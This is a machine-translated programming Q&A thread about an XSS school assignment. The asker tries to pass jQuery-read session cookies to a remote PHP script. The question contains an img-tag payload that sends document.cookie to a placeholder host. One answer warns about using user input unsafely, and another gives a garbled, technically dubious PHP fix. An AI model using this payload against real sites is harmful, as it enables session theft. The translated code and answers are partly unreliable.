我想将变量作为值传递给网站。 (在XSS上完成学校作业)
例如我目前有: $ .cookie('echat')和$ .cookie('PHPSESSID')
我想把它传递给一个链接说: xxxx.com/xxx.php?cookie = $。饼干( 'PHPSESSID')
但是,没有任何内容传递给xxxx.com/xxx.php
Any1知道这样做的语法吗?
具体来说,我正在放置一个这样的img标签来利用:
& lt img src ='http://xxxxx.com/xxxxx.php?cookie='+ document.cookie& gt
显然,document.cookie无法运行,我需要$ .cookie('PHPSESSID')来获取PHPID
答案 0 :(得分:0)
您的网址正在PHP脚本中将$_GET['cookie']的值设置为$.cookie('PHPSESSID'),仅此而已。如何处理由PHP决定。
因为它看起来像JavaScript(特别是jQuery Cookie插件),你可以想象在你的PHP中做echo "<script>{$_GET['cookie']}</script>";在结果页面上将它作为JS吐出。正如您希望从您的课程中了解到的那样,盲目地使用用户提交的数据是危险而且是个坏主意。
答案 1 :(得分:-1)
使用这个php函数
url_encode("string")
,例如
http://www.xxxxx.com/xxx.php?cookie=<?php echo url_encode("$.cookie('PHPSESSID')"); ?>